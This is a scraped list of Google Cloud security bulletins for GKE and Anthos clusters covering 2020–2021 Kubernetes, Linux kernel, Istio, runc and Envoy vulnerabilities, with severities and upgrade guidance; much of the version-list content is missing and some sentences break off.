A security issue was discovered in Kubernetes, CVE-2021-25741, where a user may be able to create a container with subpath volume mounts to access files & directories outside of the volume, including on the host filesystem. Technical details:In CVE-2021-25741, the attacker can create a symbolic link from a mounted emptyDir to the root filesystem of the node ( / ), the kubelet will follow the symlink and mount the host root into the container.What should I do?Updated 2021-09-24: Patched versions 1.8.3 and 1.7.4 are now available. Updated 2021-09-17: Corrected the list of available versions that contain the patch. The following versions of GKE on VMware have been updated with code to fix this vulnerability. Upgrade your admin clusters and user clusters to one of the following versions:
|
High |
GKE clusters on
Description | Severity |
---|---|
A security issue was discovered in Kubernetes, CVE-2021-25741, where a user may be able to create a container with subpath volume mounts to access files & directories outside of the volume, including on the host filesystem. Technical details:In CVE-2021-25741, the attacker can create a symbolic link from a mounted emptyDir to the root filesystem of the node ( / ), the kubelet will follow the symlink and mount the host root into the container.What should I do?2021-9-16 Update: Added list of supported gke-versions for The following versions of GKE on AWS have been updated with code to fix this vulnerability. It is recommended that you:
|
High |
GKE clusters on
Description | Severity |
---|---|
A security issue was discovered in Kubernetes, CVE-2021-25741, where a user may be able to create a container with subpath volume mounts to access files & directories outside of the volume, including on the host filesystem. Technical details:In CVE-2021-25741, the attacker can create a symbolic link from a mounted emptyDir to the root filesystem of the node ( / ), the kubelet will follow the symlink and mount the host root into the container.What should I do?The following versions of GKE on Bare Metal have been updated with code to fix this vulnerability. Upgrade your admin clusters and user clusters to one of the following versions:
|
High |
GCP-2021-017
Published: 2021-09-01Updated: 2021-09-23
Reference: CVE-2021-33909
CVE-2021-33910
GKE
Description | Severity |
---|---|
2021-09-23 update:Containers running inside of GKE Sandbox are unaffected by this vulnerability for attacks originating inside the container. 2021-09-15 update:The following GKE versions address the vulnerabilities:
Two security vulnerabilities, CVE-2021-33909 and CVE-2021-33910, have been discovered in the Linux kernel that can lead to an OS crash or an escalation to root by an unprivileged user. This vulnerability affects all GKE node operating systems (COS and Ubuntu). Technical details:In CVE-2021-33909, the
Linux kernel's filesystem layer does not properly restrict seq buffer allocations, leading
to an integer overflow, an Out-of-bounds Write, and escalation to root. What should I do?The versions of Linux node images for the following versions of GKE have been updated with code to fix this vulnerability. Upgrade your clusters to one of the following versions:
|
High |
GKE clusters on
Description | Severity |
---|---|
Two security vulnerabilities, CVE-2021-33909 and CVE-2021-33910, have been discovered in the Linux kernel that can lead to an OS crash or an escalation to root by an unprivileged user. This vulnerability affects all GKE node operating systems (COS and Ubuntu). Technical details:In CVE-2021-33909, the
Linux kernel's filesystem layer does not properly restrict seq buffer allocations, leading
to an integer overflow, an Out-of-bounds Write, and escalation to root. What should I do?The versions of Linux node images for GKE on AWS have been updated with code
to fix this vulnerability. Upgrade your clusters to one of the following versions:
|
High |
GKE clusters on
Description | Severity |
---|---|
Two security vulnerabilities, CVE-2021-33909 and CVE-2021-33910, have been discovered in the Linux kernel that can lead to an OS crash or an escalation to root by an unprivileged user. This vulnerability affects all GKE node operating systems (COS and Ubuntu). Technical details:In CVE-2021-33909, the
Linux kernel's filesystem layer does not properly restrict seq buffer allocations, leading
to an integer overflow, an Out-of-bounds Write, and escalation to root. What should I do?The versions of Linux and COS node images for GKE on VMware have been updated with code
to fix this vulnerability. Upgrade your clusters to one of the following versions:
|
High |
GCP-2021-015
Published: 2021-07-13Updated: 2021-07-15
Reference: CVE-2021-22555
GKE
Description | Severity |
---|---|
A new security vulnerability, CVE-2021-22555,
has been discovered where a malicious actor with Technical details
In this attack, an out-of-bounds write in What should I do?The following versions of Linux on GKE have been updated with code to fix this vulnerability. Upgrade your clusters to one of the following versions:
What vulnerability is addressed by this patch? |
High |
GKE clusters on
Description | Severity |
---|---|
A new security vulnerability, CVE-2021-22555,
has been discovered where a malicious actor with Technical details
In this attack, an out-of-bounds write in What should I do?The following versions of Linux on GKE on VMware have been updated with code to fix this vulnerability. Upgrade your clusters to one of the following versions:
What vulnerability is addressed by this patch? |
High |
GCP-2021-014
Published: 2021-07-05Reference: CVE-2021-34527
GKE
Description | Severity |
---|---|
Microsoft published a security bulletin on a Remote code execution (RCE) vulnerability, CVE-2021-34527, that affects the print spooler in Windows servers. The CERT Coordination Center (CERT/CC) published an update note on a related vulnerability, dubbed "PrintNightmare" that also affects Windows print spoolers - PrintNightmare, Critical Windows Print Spooler Vulnerability What should I do?No action is required. GKE Windows nodes do not contain the affected Spooler service as part of the base image, so GKE Windows deployments are not vulnerable to this attack. What vulnerabilities are addressed by this bulletin?
|
High |
GCP-2021-012
Published: 2021-07-01Updated: 2021-07-09
Reference: CVE-2021-34824
GKE
Description | Severity |
---|---|
What should I do?The Istio project recently disclosed a new security vulnerability (CVE-2021-34824) affecting Istio. Istio contains a remotely exploitable vulnerability where credentials specified in the Gateway and DestinationRule credentialName field can be accessed from different namespaces. Technical details:The Istio secure Gateway or workloads using the DestinationRule can load TLS private keys and certificates from Kubernetes secrets via the credentialName configuration. From Istio 1.8 and above, the secrets are read from istiod and conveyed to gateways and workloads via XDS. Normally, a gateway or workload deployment is only able to access TLS certificates and private keys stored in the secret within its namespace. However, a bug in istiod allows a client authorized to access the Istio XDS API to retrieve any TLS certificate and private keys cached in istiod. What should I do?GKE clusters do not run Istio by default and, when enabled, use Istio version 1.6, which is not vulnerable to this attack. If you have installed or upgraded Istio on the cluster to Istio 1.8 or above, upgrade your Istio to the latest supported version. |
High |
GKE clusters on
Description | Severity |
---|---|
What should I do?The Istio project recently disclosed a new security vulnerability (CVE-2021-34824) affecting Istio. Istio contains a remotely exploitable vulnerability where credentials specified in the Gateway and DestinationRule credentialName field can be accessed from different namespaces. Technical details:The Istio secure Gateway or workloads using the DestinationRule can load TLS private keys and certificates from Kubernetes secrets via the credentialName configuration. From Istio 1.8 and above, the secrets are read from istiod and conveyed to gateways and workloads via XDS. Normally, a gateway or workload deployment is only able to access TLS certificates and private keys stored in the secret within its namespace. However, a bug in istiod allows a client authorized to access the Istio XDS API to retrieve any TLS certificate and private keys cached in istiod. What should I do?Anthos clusters on VMware v1.6 and v1.7 are not vulnerable to this attack. Anthos clusters on VMware v1.8 are vulnerable. If you are using Anthos clusters on VMware v1.8, upgrade to the following patched version or later:
|
High |
GKE clusters on
Description | Severity |
---|---|
What should I do?The Istio project recently disclosed a new security vulnerability (CVE-2021-34824) affecting Istio. Istio contains a remotely exploitable vulnerability where credentials specified in the Gateway and DestinationRule credentialName field can be accessed from different namespaces. Technical details:The Istio secure Gateway or workloads using the DestinationRule can load TLS private keys and certificates from Kubernetes secrets via the credentialName configuration. From Istio 1.8 and above, the secrets are read from istiod and conveyed to gateways and workloads via XDS. Normally, a gateway or workload deployment is only able to access TLS certificates and private keys stored in the secret within its namespace. However, a bug in istiod allows a client authorized to access the Istio XDS API to retrieve any TLS certificate and private keys cached in istiod. Clusters created or upgraded with Anthos clusters on bare metal v1.8.0 are impacted by this CVE. What should I do?Anthos v1.6 and 1.7 are not vulnerable to this attack. If you have v1.8.0 clusters, download and install the 1.8.1 version of bmctl and upgrade your clusters to the following patched version:
|
High |
GCP-2021-011
Published: 2021-06-04Updated: 2021-10-19
Reference: CVE-2021-30465
2021-10-19 update: Added bulletins for GKE on VMware, GKE on AWS, and GKE on Bare Metal.
GKE
Description | Severity |
---|---|
The security community recently disclosed a new security vulnerability
(CVE-2021-30465)
found in For GKE, because exploiting this vulnerability requires the ability to create pods, we have rated the severity of this vulnerability at MEDIUM. Technical details
The For this specific attack, a user can potentially exploit a race condition by starting multiple pods on a single node simultaneously, all of which share the same volume mount with a symlink. If the attack succeeds, one of the pods will mount the node's filesystem with root permissions. What should I do?There is a newly released patch to Upgrade your GKE cluster to one of the following updated versions:
|
Medium |
GKE clusters on
Description | Severity |
---|---|
The security community recently disclosed a new security vulnerability
(CVE-2021-30465)
found in For GKE on VMware, because exploiting this vulnerability requires the ability to create pods, we have rated the severity of this vulnerability at MEDIUM. Technical details
The For this specific attack, a user can potentially exploit a race condition by starting multiple pods on a single node simultaneously, all of which share the same volume mount with a symlink. If the attack succeeds, one of the pods will mount the node's filesystem with root permissions. What should I do?There is a newly released patch to
|
Medium |
GKE clusters on
Description | Severity |
---|---|
The security community recently disclosed a new security vulnerability
(CVE-2021-30465)
found in Because this is an OS-level vulnerability, GKE on AWS are not vulnerable. Technical details
The For this specific attack, a user can potentially exploit a race condition by starting multiple pods on a single node simultaneously, all of which share the same volume mount with a symlink. If the attack succeeds, one of the pods will mount the node's filesystem with root permissions. What should I do?Ensure that the OS version on which you are running GKE on AWS is upgraded to the latest OS version that has an updatedrunc package.
|
None |
GKE clusters on
Description | Severity |
---|---|
The security community recently disclosed a new security vulnerability
(CVE-2021-30465)
found in Because this is an OS-level vulnerability, GKE on Bare Metal are not vulnerable. Technical details
The For this specific attack, a user can potentially exploit a race condition by starting multiple pods on a single node simultaneously, all of which share the same volume mount with a symlink. If the attack succeeds, one of the pods will mount the node's filesystem with root permissions. What should I do?
Ensure that the OS version on which you are running Google Distributed Cloud Virtual for Bare Metal is
upgraded to the latest OS version that has an updated |
None |
GCP-2021-006
Published: 2021-05-11Reference: CVE-2021-31920
GKE
Description | Severity |
---|---|
The Istio project recently disclosed a new security vulnerability (CVE-2021-31920) affecting Istio. Istio contains a remotely-exploitable vulnerability where an HTTP request with multiple slashes or escaped slash characters can bypass Istio authorization policy when path based authorization rules are used. What should I do?We strongly recommend that you update and reconfigure your GKE clusters. Please note it is important to complete both steps below to successfully resolve the vulnerability:
|
High |
GCP-2021-004
Published: 2021-05-06Reference: CVE-2021-28683, CVE-2021-28682, CVE-2021-29258
GKE
Description | Severity |
---|---|
The Envoy and Istio projects recently announced several new security vulnerabilities (CVE-2021-28683, CVE-2021-28682 and CVE-2021-29258), that could allow an attacker to crash Envoy. GKE clusters do not run Istio by default and are not vulnerable. If Istio has been installed in a cluster and configured to expose services to the internet, those services may be vulnerable to denial of service. What should I do?To fix these vulnerabilities, upgrade your GKE control plane to one of the following patched versions:
|
Medium |
GKE clusters on
Description | Severity |
---|---|
The Envoy and Istio projects recently announced several new security vulnerabilities (CVE-2021-28683, CVE-2021-28682 and CVE-2021-29258), that could allow an attacker to crash Envoy. GKE on VMware use Envoy by default for Ingress, so Ingress services may be vulnerable to denial of service. What should I do?To fix these vulnerabilities, upgrade your GKE on VMware to one of the following patched versions when released:
|
Medium |
GKE clusters on
Updated: 2021-05-06
Description | Severity |
---|---|
The Envoy and Istio projects recently announced several new security vulnerabilities (CVE-2021-28683, CVE-2021-28682 and CVE-2021-29258), that could allow an attacker to crash Envoy. Google Distributed Cloud Virtual for Bare Metal uses Envoy by default for Ingress, so Ingress services may be vulnerable to denial of service. What should I do?To fix these vulnerabilities, upgrade your Google Distributed Cloud Virtual for Bare Metal cluster to one of the following patched versions when released:
|
Medium |
GCP-2021-003
Published: 2021-04-19Reference: CVE-2021-25735
GKE
Description | Severity |
---|---|
The Kubernetes project recently announced a new security vulnerability, CVE-2021-25735, that could allow node updates to bypass a Validating Admission Webhook. In a scenario where an attacker has sufficient privileges and where a Validating
Admission Webhook is implemented that uses old What should I do?To fix this vulnerability, upgrade your GKE cluster to one of the following patched versions:
|
Medium |
GKE clusters on
Description | Severity |
---|---|
The Kubernetes project recently announced a new security vulnerability, CVE-2021-25735, that could allow node updates to bypass a Validating Admission Webhook. In a scenario where an attacker has sufficient privileges and where a Validating
Admission Webhook is implemented that uses old What should I do?An upcoming patch version will include a mitigation for this vulnerability. |
Medium |
GKE clusters on
Description | Severity |
---|---|
The Kubernetes project recently announced a new security vulnerability, CVE-2021-25735, that could allow node updates to bypass a Validating Admission Webhook. In a scenario where an attacker has sufficient privileges and where a Validating
Admission Webhook is implemented that uses old What should I do?An upcoming patch version will include a mitigation for this vulnerability. |
Medium |
GKE clusters on
Description | Severity |
---|---|
The Kubernetes project recently announced a new security vulnerability, CVE-2021-25735, that could allow node updates to bypass a Validating Admission Webhook. In a scenario where an attacker has sufficient privileges and where a Validating
Admission Webhook is implemented that uses old What should I do?An upcoming patch version will include a mitigation for this vulnerability. |
Medium |
GCP-2021-001
Published: 2021-01-28Reference: CVE-2021-3156
GKE
Description | Severity |
---|---|
A vulnerability was recently discovered in the Linux utility Google Kubernetes Engine (GKE) clusters are not affected by this vulnerability:
What should I do?Because GKE clusters are not affected by this vulnerability, no further action is required. GKE will have the patch for this vulnerability applied in a coming release at regular cadence. |
None |
GKE clusters on
Description | Severity |
---|---|
A vulnerability was recently discovered in the Linux utility GKE on VMware are not affected by this vulnerability:
What should I do?Because GKE on VMware clusters are not affected by this vulnerability, no further action is required. GKE on VMware will have the patch for this vulnerability applied in a coming release at regular cadence. |
None |
GKE clusters on
Description | Severity |
---|---|
A vulnerability was recently discovered in the Linux utility GKE on AWS are not affected by this vulnerability:
What should I do?Because GKE on AWS clusters are not affected by this vulnerability, no further action is required. GKE on AWS will have the patch for this vulnerability applied in a coming release at regular cadence. |
None |
GKE clusters on
Description | Severity |
---|---|
A vulnerability was recently discovered in the Linux utility Google Distributed Cloud Virtual for Bare Metal clusters are not affected by this vulnerability:
What should I do?Because Google Distributed Cloud Virtual for Bare Metal clusters are not affected by this vulnerability, no further action is required. Google Distributed Cloud Virtual for Bare Metal will have the patch for this vulnerability applied in a coming release at regular cadence. |
None |
GCP-2020-015
Published: 2020-12-07Updated: 2021-12-22
Reference: CVE-2020-8554
2021-12-22 update: Uses gcloud beta
instead of the
gcloud
command.
2021-12-15 update: Added additional mitigate for GKE.
GKE
Description | Severity |
---|---|
Updated: 2021-12-22 The command for GKE in the following section
should use gcloud beta instead of the gcloud command.
gcloud beta container clusters update –no-enable-service-externalips Updated: 2021-12-15 For GKE, the following mitigation is now available:
For more information, see Hardening your cluster's security. The Kubernetes project recently discovered a new security vulnerability, CVE-2020-8554, that might allow an attacker who has obtained permissions to create a Kubernetes Service of type LoadBalancer or ClusterIP to intercept network traffic originating from other Pods in the cluster. This vulnerability by itself does not give an attacker permissions to create a Kubernetes Service. All Google Kubernetes Engine (GKE) clusters are affected by this vulnerability. What should I do?Kubernetes might need to make backwards incompatible design changes in a future version to address the vulnerability. If many users share access to your cluster with permissions to create Services, such as in a multi-tenant cluster, consider applying a mitigation in the meantime. For now, the best approach for mitigation is to restrict the use of ExternalIPs in a cluster. ExternalIPs are not a commonly used feature. Restrict the use of ExternalIPs in a cluster with one of the following methods:
As mentioned in the
Kubernetes announcement,
no mitigation is provided for Services of type LoadBalancer because, by default, only highly
privileged users and system components are granted the |
Medium |
GKE clusters on
Description | Severity |
---|---|
Updated: 2021-12-22 The command for GKE in the following section
should use gcloud beta instead of the gcloud command.
gcloud beta container clusters update –no-enable-service-externalips Updated: 2021-12-15 For GKE, the following mitigation is now available:
For more information, see Hardening your cluster's security. The Kubernetes project recently discovered a new security vulnerability, CVE-2020-8554, that might allow an attacker who has obtained permissions to create a Kubernetes Service of type LoadBalancer or ClusterIP to intercept network traffic originating from other Pods in the cluster. This vulnerability by itself does not give an attacker permissions to create a Kubernetes Service. All GKE on VMware are affected by this vulnerability. What should I do?Kubernetes might need to make backwards incompatible design changes in a future version to address the vulnerability. If many users share access to your cluster with permissions to create Services, such as in a multi-tenant cluster, consider applying a mitigation in the meantime. For now, the best approach for mitigation is to restrict the use of ExternalIPs in a cluster. ExternalIPs are not a commonly used feature. Restrict the use of ExternalIPs in a cluster with one of the following methods:
As mentioned in the
Kubernetes announcement,
no mitigation is provided for Services of type LoadBalancer because, by default, only highly
privileged users and system components are granted the |
Medium |
GKE clusters on
Description | Severity |
---|---|
Updated: 2021-12-22 The command for GKE in the following section
should use gcloud beta instead of the gcloud command.
gcloud beta container clusters update –no-enable-service-externalips Updated: 2021-12-15 For GKE, the following mitigation is now available:
For more information, see Hardening your cluster's security. The Kubernetes project recently discovered a new security vulnerability, CVE-2020-8554, that might allow an attacker who has obtained permissions to create a Kubernetes Service of type LoadBalancer or ClusterIP to intercept network traffic originating from other Pods in the cluster. This vulnerability by itself does not give an attacker permissions to create a Kubernetes Service. All GKE on AWS are affected by this vulnerability. What should I do?Kubernetes might need to make backwards incompatible design changes in a future version to address the vulnerability. If many users share access to your cluster with permissions to create Services, such as in a multi-tenant cluster, consider applying a mitigation in the meantime. For now, the best approach for mitigation is to restrict the use of ExternalIPs in a cluster. ExternalIPs are not a commonly used feature. Restrict the use of ExternalIPs in a cluster with one of the following methods:
As mentioned in the
Kubernetes announcement,
no mitigation is provided for Services of type LoadBalancer because, by default, only highly
privileged users and system components are granted the |
Medium |
GCP-2020-014
Published: 2020-10-20Reference: CVE-2020-8563, CVE-2020-8564, CVE-2020-8565, CVE-2020-8566
GKE
Updated: 2020-10-20
Description | Severity |
---|---|
The Kubernetes project recently discovered several issues that allow for the exposure of secret data when verbose logging options are enabled. The issues are:
GKE is not affected. What should I do?No further action is required due to the default verbosity logging levels of GKE. |
None |
GKE clusters on
Updated: 2020-10-10
Description | Severity |
---|---|
The Kubernetes project recently discovered several issues that allow for the exposure of secret data when verbose logging options are enabled. The issues are:
GKE on VMware is not affected. What should I do?No further action is required due to the default verbosity logging levels of GKE. |
None |
GKE clusters on
Updated: 2020-10-20
Description | Severity |
---|---|
The Kubernetes project recently discovered several issues that allow for the exposure of secret data when verbose logging options are enabled. The issues are:
GKE on AWS is not affected. What should I do?No further action is required due to the default verbosity logging levels of GKE. |
None |
GCP-2020-012
Published: 2020-09-14Reference: CVE-2020-14386
GKE
Description | Severity |
---|---|
A vulnerability was recently discovered in the Linux kernel, described in CVE-2020-14386, that may allow container escape to obtain root privileges on the host node. All GKE nodes are affected. Pods running in GKE Sandbox are not able to leverage this vulnerability. What should I do?To fix this vulnerability, upgrade your control plane, and then your nodes to one of the patched versions listed below:
Exploiting this vulnerability requires Drop the
What vulnerability is addressed by this patch?The patch mitigates the following vulnerability: The vulnerability CVE-2020-14386,
which allows containers with |
High |
GKE clusters on
Updated: 2020-09-17
Description | Severity |
---|---|
A vulnerability was recently discovered in the Linux kernel, described in CVE-2020-14386, that may allow container escape to obtain root privileges on the host node. All GKE on VMware nodes are affected. What should I do?To fix this vulnerability, upgrade your cluster to a patched version. The following upcoming {gke_on_prem_name}} versions will contain the fix for this vulnerability, and this bulletin will be updated when they are available:
Exploiting this vulnerability requires Drop the
What vulnerability is addressed by this patch?The patch mitigates the following vulnerability: The vulnerability CVE-2020-14386,
which allows containers with |
High |
GKE clusters on
Updated: 2020-10-13
Description | Severity |
---|---|
A vulnerability was recently discovered in the Linux kernel, described in CVE-2020-14386, that may allow container escape to obtain root privileges on the host node. All GKE on AWS nodes are affected. What should I do?To fix this vulnerability, upgrade your management service and your user clusters to a patched version. The following upcoming GKE on AWS versions or newer will include the fix for this vulnerability, and this bulletin will be updated when they are available:
Drop the
What vulnerability is addressed by this patch?The patch mitigates the following vulnerability: The vulnerability CVE-2020-14386,
which allows containers with |
High |
GCP-2020-011
Published: 2020-07-24Reference: CVE-2020-8558
GKE
Description | Severity |
---|---|
A networking vulnerability, CVE-2020-8558, was recently discovered in Kubernetes. Services sometimes communicate with other applications running inside the same Pod using the local loopback interface (127.0.0.1). This vulnerability allows an attacker with access to the cluster's network to send traffic to the loopback interface of adjacent Pods and nodes. Services that rely on the loopback interface not being accessible outside their Pod could be exploited. Exploiting this vulnerability on GKE clusters requires an attacker to have network administrator privileges on the Google Cloud hosting the cluster's VPC. This vulnerability alone does not give an attacker network administrator privileges. For this reason, this vulnerability has been assigned a Low severity for GKE. What should I do?To fix this vulnerability, upgrade your cluster's node pools to the following GKE versions (and later):
What vulnerability is addressed by this patch?This patch fixes the following vulnerability: CVE-2020-8558. |
Low |
GKE clusters on
Description | Severity |
---|---|
A networking vulnerability, CVE-2020-8558, was recently discovered in Kubernetes. Services sometimes communicate with other applications running inside the same Pod using the local loopback interface (127.0.0.1). This vulnerability allows an attacker with access to the cluster's network to send traffic to the loopback interface of adjacent Pods and nodes. Services that rely on the loopback interface not being accessible outside their Pod could be exploited. What should I do?To fix this vulnerability, upgrade your cluster to a patched version. The following upcoming GKE on VMware versions or newer contain the fix for this vulnerability:
What vulnerability is addressed by this patch?This patch fixes the following vulnerability: CVE-2020-8558. |
Medium |
GKE clusters on
Description | Severity |
---|---|
A networking vulnerability, CVE-2020-8558, was recently discovered in Kubernetes. Services sometimes communicate with other applications running inside the same Pod using the local loopback interface (127.0.0.1). This vulnerability allows an attacker with access to the cluster's network to send traffic to the loopback interface of adjacent Pods and nodes. Services that rely on the loopback interface not being accessible outside their Pod could be exploited. Exploiting this vulnerability on user clusters requires an attacker to disable
source destination checks
on the EC2 instances in the cluster. This requires the attacker to have AWS IAM permissions
for What should I do?To fix this vulnerability, upgrade your cluster to a patched version. The following upcoming GKE on AWS versions or newer are expected to include the fix for this vulnerability:
What vulnerability is addressed by this patch?This patch fixes the following vulnerability: CVE-2020-8558. |
Low |
GCP-2020-009
Published: 2020-07-15Reference: CVE-2020-8559
GKE
Description | Severity |
---|---|
A privilege escalation vulnerability, CVE-2020-8559, was recently discovered in Kubernetes. This vulnerability allows an attacker that has already compromised a node to execute a command in any Pod in the cluster. The attacker can thereby use the already compromised node to compromise other nodes and potentially read information, or cause destructive actions. Note that for an attacker to exploit this vulnerability, a node in your cluster must have already been compromised. This vulnerability, by itself, will not compromise any nodes in your cluster. What should I do?Upgrade your cluster to a patched version. Clusters will be auto-upgraded over the next weeks, and patched versions will be available by July 19, 2020 for an accelerated manual upgrade schedule. The following GKE control plane versions or newer contain the fix for this vulnerability:
What vulnerability is addressed by this patch?These patches mitigate vulnerability CVE-2020-8559. This is rated as a Medium vulnerability for GKE, as it requires the attacker to have first hand information about the cluster, nodes, and workloads to effectively leverage this attack in addition to an existing compromised node. This vulnerability by itself will not provide an attacker with a compromised node. |
Medium |
GKE clusters on
Description | Severity |
---|---|
A privilege escalation vulnerability, CVE-2020-8559, was recently discovered in Kubernetes. This vulnerability allows an attacker that has already compromised a node to execute a command in any Pod in the cluster. The attacker can thereby use the already compromised node to compromise other nodes and potentially read information, or cause destructive actions. Note that for an attacker to exploit this vulnerability, a node in your cluster must have already been compromised. This vulnerability, by itself, will not compromise any nodes in your cluster. What should I do?Upgrade your cluster to a patched version. The following upcoming GKE on VMware versions or newer contain the fix for this vulnerability:
What vulnerability is addressed by this patch?These patches mitigate vulnerability CVE-2020-8559. This is rated as a Medium vulnerability for GKE, as it requires the attacker to have first hand information about the cluster, nodes, and workloads to effectively leverage this attack in addition to an existing compromised node. This vulnerability by itself will not provide an attacker with a compromised node. |
Medium |
GKE clusters on
Description | Severity |
---|---|
A privilege escalation vulnerability, CVE-2020-8559, was recently discovered in Kubernetes. This vulnerability allows an attacker that has already compromised a node to execute a command in any Pod in the cluster. The attacker can thereby use the already compromised node to compromise other nodes and potentially read information, or cause destructive actions. Note that for an attacker to exploit this vulnerability, a node in your cluster must have already been compromised. This vulnerability, by itself, will not compromise any nodes in your cluster. What should I do?GKE on AWS GA (1.4.1, available end of July, 2020) or newer includes the patch for this vulnerability. If you are using a previous version, download a new version of the anthos-gke command line tool and recreate your management and user clusters. What vulnerability is addressed by this patch?These patches mitigate vulnerability CVE-2020-8559. This is rated as a Medium vulnerability for GKE, as it requires the attacker to have first hand information about the cluster, nodes, and workloads to effectively leverage this attack in addition to an existing compromised node. This vulnerability by itself will not provide an attacker with a compromised node. |
Medium |
GCP-2020-007
Published: 2020-06-01Reference: CVE-2020-8555
GKE
Description | Severity |
---|---|
Server Side Request Forgery (SSRF) vulnerability, CVE-2020-8555, was recently discovered in Kubernetes, allowing certain authorized users to leak up to 500 bytes of sensitive information from the control plane host network. The Google Kubernetes Engine (GKE) control plane uses controllers from Kubernetes and is thus affected by this vulnerability. We recommend that you upgrade the control plane to the latest patch version, as we detail below. A node upgrade is not required. What should I do?For most customers, no further action is required. The vast majority of clusters are already running a patched version. The following GKE versions or newer contain the fix for this vulnerability:
Clusters using release channels are already on control plane versions with the mitigation. What vulnerability is addressed by this patch?These patches mitigate vulnerability CVE-2020-8555. This is rated as a Medium vulnerability for GKE as it was difficult to exploit due to various control plane hardening measures. An attacker with permissions to create a Pod with certain
built-in Volume types (GlusterFS, Quobyte, StorageFS, ScaleIO) or
permissions to create a StorageClass can cause
Combined with a means to leak the results of the |
Medium |
GKE clusters on
Description | Severity |
---|---|
Server Side Request Forgery (SSRF) vulnerability, CVE-2020-8555, was recently discovered in Kubernetes, allowing certain authorized users to leak up to 500 bytes of sensitive information from the control plane host network. The Google Kubernetes Engine (GKE) control plane uses controllers from Kubernetes and is thus affected by this vulnerability. We recommend that you upgrade the control plane to the latest patch version, as we detail below. A node upgrade is not required. What should I do?The following GKE on VMware versions or newer contain the fix for this vulnerability:
If you are using a previous version, upgrade your existing cluster to a version containing the fix. What vulnerability is addressed by this patch?These patches mitigate vulnerability CVE-2020-8555. This is rated as a Medium vulnerability for GKE as it was difficult to exploit due to various control plane hardening measures. An attacker with permissions to create a Pod with certain
built-in Volume types (GlusterFS, Quobyte, StorageFS, ScaleIO) or
permissions to create a StorageClass can cause
Combined with a means to leak the results of the |
Medium |
GKE clusters on
Description | Severity |
---|---|
Server Side Request Forgery (SSRF) vulnerability, CVE-2020-8555, was recently discovered in Kubernetes, allowing certain authorized users to leak up to 500 bytes of sensitive information from the control plane host network. The Google Kubernetes Engine (GKE) control plane uses controllers from Kubernetes and is thus affected by this vulnerability. We recommend that you upgrade the control plane to the latest patch version, as we detail below. A node upgrade is not required. What should I do?GKE on AWS v0.2.0 or newer already includes the patch for this vulnerability. If you are using a previous version, download a new version of the anthos-gke command line tool and recreate your management and user clusters. What vulnerability is addressed by this patch?These patches mitigate vulnerability CVE-2020-8555. This is rated as a Medium vulnerability for GKE as it was difficult to exploit due to various control plane hardening measures. An attacker with permissions to create a Pod with certain
built-in Volume types (GlusterFS, Quobyte, StorageFS, ScaleIO) or
permissions to create a StorageClass can cause
Combined with a means to leak the results of the |
Medium |
GCP-2020-006
Published: 2020-06-01Reference: Kubernetes issue 91507
GKE
Description | Severity |
---|---|
Kubernetes has disclosed a vulnerability that allows a privileged container to redirect node traffic to another container. Mutual TLS/SSH traffic, such as between the kubelet and API server or traffic from applications using mTLS cannot be read or modified by this attack. All Google Kubernetes Engine (GKE) nodes are affected by this vulnerability, and we recommend that you upgrade to the latest patch version, as we detail below. What should I do?To mitigate this vulnerability, upgrade your control plane, and then your nodes to one of the patched versions listed below. Clusters on release channels are already running a patched version on both control plane and nodes:
Very few containers typically require Drop the
What vulnerability is addressed by this patch?The patch mitigate the following vulnerability: The vulnerability described in
Kubernetes issue 91507
|
Medium |
GKE clusters on
Description | Severity |
---|---|
Kubernetes has disclosed a vulnerability that allows a privileged container to redirect node traffic to another container. Mutual TLS/SSH traffic, such as between the kubelet and API server or traffic from applications using mTLS cannot be read or modified by this attack. All Google Kubernetes Engine (GKE) nodes are affected by this vulnerability, and we recommend that you upgrade to the latest patch version, as we detail below. What should I do?To mitigate this vulnerability for GKE on VMware, upgrade your clusters to the following version or newer:
Very few containers typically require Drop the
What vulnerability is addressed by this patch?The patch mitigate the following vulnerability: The vulnerability described in
Kubernetes issue 91507
|
Medium |
GKE clusters on
Description | Severity |
---|---|
Kubernetes has disclosed a vulnerability that allows a privileged container to redirect node traffic to another container. Mutual TLS/SSH traffic, such as between the kubelet and API server or traffic from applications using mTLS cannot be read or modified by this attack. All Google Kubernetes Engine (GKE) nodes are affected by this vulnerability, and we recommend that you upgrade to the latest patch version, as we detail below. What should I do?Download the anthos-gke command line tool with the following version or newer and recreate your management and user clusters:
Very few containers typically require Drop the
What vulnerability is addressed by this patch?The patch mitigate the following vulnerability: The vulnerability described in
Kubernetes issue 91507
|
Medium |
GCP-2020-005
Published: 2020-05-07Updated: 2020-05-07
Reference: CVE-2020-8835
GKE
Description | Severity |
---|---|
A vulnerability was recently discovered in the Linux kernel, described in CVE-2020-8835, allowing container escape to obtain root privileges on the host node. Google Kubernetes Engine (GKE) Ubuntu nodes running GKE 1.16 or 1.17 are affected by this vulnerability, and we recommend that you upgrade to the latest patch version as soon as possible, as we detail below. Nodes running Container-Optimized OS are not affected. Nodes running on GKE on VMware are not affected. What should I do?For most customers, no further action is required. Only nodes running Ubuntu in GKE version 1.16 or 1.17 are affected. In order to upgrade your nodes, you must first upgrade your master to the newest version. This patch will be available in Kubernetes 1.16.8-gke.12, 1.17.4-gke.10, and newer releases. Track the availability of these patches in the release notes. What vulnerability is addressed by this patch?The patch mitigates the following vulnerability: CVE-2020-8835 describes a vulnerability in the Linux kernel version 5.5.0 and newer that allows a malicious container to (with minimal user interaction in the form of an exec) read and write kernel memory and thus gain root-level code execution on the host node. This is rated as a 'High' severity vulnerability. |
High |
GCP-2020-004
Published: 2020-05-07Updated: 2020-05-07
Reference: CVE-2019-11254
GKE clusters on
Description | Severity |
---|---|
A vulnerability was recently discovered in Kubernetes, described in CVE-2019-11254, which allows any user authorized to make POST requests to execute a remote Denial-of-Service attack on a Kubernetes API server. The Kubernetes Product Security Committee (PSC) released additional information on this vulnerability which can be found here. You can mitigate this vulnerability by limiting which clients have network access to your Kubernetes API servers. What should I do?We recommend that you upgrade your clusters to patch versions containing the fix for this vulnerability as soon as they are available. The patch versions which contain the fix are listed below:
What vulnerabilities are addressed by this patch?The patch fixes the following Denial-of-Service (DoS) vulnerability: |
Medium |
GCP-2020-003
Published: 2020-03-31Updated: 2020-03-31
Reference: CVE-2019-11254
GKE
Description | Severity |
---|---|
A vulnerability was recently discovered in Kubernetes, described in CVE-2019-11254, which allows any user authorized to make POST requests to execute a remote Denial-of-Service attack on a Kubernetes API server. The Kubernetes Product Security Committee (PSC) released additional information on this vulnerability which can be found here. GKE Clusters that use Master Authorized Networks and Private clusters with no public endpoint mitigate this vulnerability. What should I do?We recommend that you upgrade your cluster to a patch version containing the fix for this vulnerability. The patch versions which contain the fix are listed below:
